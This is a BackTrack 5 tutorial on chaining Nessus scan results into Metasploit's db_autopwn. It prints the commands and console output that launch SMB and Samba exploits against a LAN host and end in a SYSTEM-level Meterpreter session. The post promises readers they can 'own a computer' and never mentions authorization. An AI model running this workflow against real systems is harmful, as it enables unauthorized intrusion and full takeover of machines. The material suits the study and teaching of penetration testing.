Metasploit Autopwn With Nessus Backtrack 5 Tutorial
Nessus is one of the best, most famous and user friendly vulnerability scanner that contain two feed one for the home user that is free while the other for professional (commercial). Metasploit, as you are related to the field of information security and penetration testing than you have must heard about it. Metasploit is a database of exploits. So the tutorial requires some background means some knowledge about Nessus and metasploit.
Nessus is just like OpenVAS but OpenVAS is open source, now from this point I consider that you have scanned a network with your Nessus if you dont know how than please read the basic tutorial about Nessus.
Now from the terminal open Metasploit
After creating the database you can do many things but it is recommended to check the help command.root@bt:# msfconsolemsf > db_create
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
msf > load db_tracker
[*] Successfully loaded plugin: db_tracker
msf >
msf > help
...snip...
Database Backend Commands
=========================
Command Description
------- -----------
db_add_host Add one or more hosts to the database
db_add_note Add a note to host
db_add_port Add a port to host
db_autopwn Automatically exploit everything
db_connect Connect to an existing database
Now the time is to import nessus result into metasploit windows, the command is below but be care while import provide the correct destination of your nessus result as i did.
msf > db_import_nessus_nbe /root/ehacking.nbe
msf > hosts
[*] Time: Tue Jun 14 17:40:23 -0600 2011 Host: 192.168.1.115 Status: alive OS:
Now use "Vulns" command that will show the vulnerabilities that has been found by Nessus.
msf > vulns
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=22 proto=tcp name=NSS-1.3.6.1.4.1.25623.1.0.50282 refs=NSS-1.3.6.1.4.1.25623.1.0.50282
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=445 proto=tcp name=NSS-1.3.6.1.4.1.25623.1.0.11011 refs=NSS-1.3.6.1.4.1.25623.1.0.11011
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=139 proto=tcp name=NSS-1.3.6.1.4.1.25623.1.0.11011 refs=NSS-1.3.6.1.4.1.25623.1.0.11011
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=137 proto=udp name=NSS-1.3.6.1.4.1.25623.1.0.10150 refs=NSS-1.3.6.1.4.1.25623.1.0.10150,CVE-1999-0621
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=445 proto=tcp name=NSS-1.3.6.1.4.1.25623.1.0.10394 refs=NSS-1.3.6.1.4.1.25623.1.0.10394
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=123 proto=udp name=NSS-1.3.6.1.4.1.25623.1.0.10884 refs=NSS-1.3.6.1.4.1.25623.1.0.10884
db_autopwn is a command that read port,services and vulnerabilities that nessus result file contain and it will suggest the best exploits.
msf > db_autopwn -h
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port
-q Disable exploit module output
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
msf > db_autopwn -x -e
[*] (8/38): Launching exploit/multi/samba/nttrans against 192.168.1.115:139...
[*] (9/38): Launching exploit/windows/smb/psexec against 192.168.1.115:445...
[*] (10/38): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.115:445...
[-] Exploit failed: The connection was refused by the remote host (192.168.1.115:22).
[*] (35/38): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.115:445...
[*] Started bind handler
[-] Exploit failed: No encoders encoded the buffer successfully.
msf >
[*] Binding to 3d742890-397c-11cf-9bf1-00805f88cb72:1.0@ncacn_np:192.168.1.115[alert] ...
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.1.115[lsarpc]...
[-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:40814 -> 192.168.1.115:14198)
Autopwn has successfully exploit and we got the Meterpreter session, so by tis technique you can easily own a computer without sending any file by using nessus and metasploit.
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.1.101:40814 -> 192.168.1.115:14198
msf > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: DOOKIE-FA154354
OS : Windows XP (Build 2600, Service Pack 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription or become our Facebook fan! You will get all the latest updates at both the places.